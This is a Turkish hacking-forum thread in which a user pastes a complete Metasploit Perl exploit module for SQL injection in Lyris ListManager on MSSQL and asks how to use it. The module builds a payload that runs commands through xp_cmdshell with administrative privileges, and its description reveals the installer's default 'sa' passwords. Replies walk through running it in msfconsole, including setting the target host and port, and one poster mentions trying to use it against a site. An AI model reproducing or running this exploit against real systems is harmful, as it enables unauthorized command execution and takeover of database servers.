Milw0rm daki exploitlerin acıklanması hk.( sorudur ) bilenler okusun.

Superhacker21

New member
Katılım
27 Ara 2005
Mesajlar
52
Reaction score
0
Puanları
0
sımdı bu www.milw0rm.com adlı site her gun exploit yayınlar
sımdı bunlardan

perl
.c
php

bu ucu ile olanları nasıl kullanılcagını ve hangi programlar ile derlenip kullanılcagını biliyoruz

peki

http://milw0rm.com/id.php?id=1133

bu tur exploitler nasıl derlenir ?
nasıl kullanılır bilgisi olanlar varmı

uzantısı ise bunların .pm
oluyor çekınce milw0rm.com dan

mesela yukarıdaki exploit konusuna ornek



##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::lyris_attachment_mssql;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'Lyris ListManager Attachment SQL Injection (MSSQL)',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
'Arch' => [ ],
'OS' => [ 'win32' ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'Payload' =>
{
'Space' => 1000,
'Keys' => ['cmd'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a SQL injection flaw in the Lyris ListManager
software for Microsoft SQL Server. This flaw allows for arbitrary commands
to be executed with administrative privileges by calling the xp_cmdshell
stored procedure. Additionally, a window of opportunity is opened during the
ListManager for MSDE install process; the 'sa' account is set to the password 'lminstall'
for a 5-10 minute period. After the installer finishes, the password is
permanently set to 'lyris' followed by the process ID of the installer (a 1-5 digit number).
}),

'Refs' =>
[
['URL', 'http://metasploit.com/research/vulns/lyris_listmanager/'],
['OSVDB', '21548'],
],

'DefaultTarget' => 0,
'Targets' =>
[
['No target needed.'],
],

'Keys' => ['lyris'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}

$s->Send("GET /read/attachment/' HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n");

my $r = $s->Recv(-1, 5);

if ($r =~ /Unclosed quotation mark before/) {
$self->PrintLine("[*] Vulnerable installation detected ;)");
return $self->CheckCode('Detected');
}

if ($r =~ /SQL error reported from Lyris/) {
$self->PrintLine("[*] Vulnerable installation, but not running MSSQL.");
return $self->CheckCode('Safe');
}

if ($r =~ /ListManagerWeb.*Content-Length: 0/sm) {
$self->PrintLine("[*] This system appears to be patched");
return $self->CheckCode('Safe');
}

$self->PrintLine("[*] Unknown response, patched or invalid target.");
return $self->CheckCode('Safe');
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');

my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

my $sql =
'DECLARE @X NVARCHAR(4000);'.
'SET @X= ';

foreach my $c (unpack('C*', $cmd)) {
$sql .= "CHAR($c) + ";
}
$sql .= "'\x20';";
$sql .= 'EXEC MASTER..XP_CMDSHELL @X';

my $url = "/read/attachment/1;".$self->URLEncode($sql).";--";


my $request =
"GET $url HTTP/1.1\r\n".
"Host: $target_host:$target_port\r\n\r\n";

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}

$self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
$s->Send($request);

$self->PrintLine("[*] Waiting for a response...");
$s->Recv(-1, 10);
$self->Handler($s);
$s->Close();
return;
}

sub URLEncode {
my $self = shift;
my $data = shift;
my $res;

foreach my $c (unpack('C*', $data)) {
if (
($c >= 0x30 && $c <= 0x39) ||
($c >= 0x41 && $c <= 0x5A) ||
($c >= 0x61 && $c <= 0x7A)
) {
$res .= chr($c);
} else {
$res .= sprintf("%%%.2x", $c);
}
}
return $res;
}

1;


# milw0rm.com [2005-12-09]




bunu nasıl derlicez mesela ???

veya en ustteki diğer verdigim orneği ??

bilen varmıdır hackhell de bu konuyu ???
 
kardeş exploitler farklı platformlarda çalışır. .pl uzantılar perl ile C leri biliyosundur shell hesabına ihtiyacın var veya linux. win altında derlemek istiyosan cygwin var ama cygwin sağlam değil kütüphaneleri eksik linkte verdiğin exploit ise metasploit ile kullanılır. "metasploit project" (www.metasploit.com) bir grubun oluşturduğu bi proje www.metasploit.com:55555 web consoledan expleri çalıştırabilirsin metasploitin dosya uzantıları yanılmıyosam .rpm di neyse yani o kodu alıp uzantısını .rpm veya herneyse yapıp makinana yükle sonra win için = http://www.metasploit.com/tools/framework-2.5.exe linkinden frameworku indir expini frameworku kurduğun dizine at msfconsoledan çalıştır. metasploitin hem linux hemde win de çalışan versiyonları var benim verdiğim win32 installer:)
*******************************************
Metasploit kullanımı ve komutlar:
msfconsolu açıp
show exploit derseniz expleri sıralar
uygun exploiti use expin adı şeklinde kullanırsın
yanlız payload da göstermem lazım
Komut = show payloads
uygun payloadı seçtikten sonra
set PAYLOAD payloadın adı [payload büyük harfle olacak] de
sonra show options
de opsiyonlar çıkar
oradan payloadın çeşidine göre
mesela RHOST =hedef ip , RPORT = hedef Port LHOST sizin ip LPORT hedef ip leri set komutuyla kurduktan sonra sana kalan tek şey exploit komutunu kullanmak kalıyo
Daha fazla bilgi, döküman ve screen show isterseniz www.metasploit.com u ziyaret edin
hackhellde milletin tek yaptığı şey expi verip kullanımını anlatmadan vermek
daha sorun varsa pm at
Warrior
 
xwarriorx helal olsun. senden başka kımse bu kadar guzel anlatamazdı. teşekkürler.
 
estağfurullah sen saol :) paylaşım için burdayız dostum
kardeş eğer linux kullanıyosan whaxin son sürümünü indir. winde pek işe yaramıyo ama whax te pentest/exploits/framework/ dizinide hepsi kurulu olarak geliyo :)
 
Xwarriorx Tşk .. güsel anlatmışsın ... Exploit olayı tamam da siteye yedirmesi falan ugrasıyoruz iştee :)kolay gelsin
 
Geri
Üst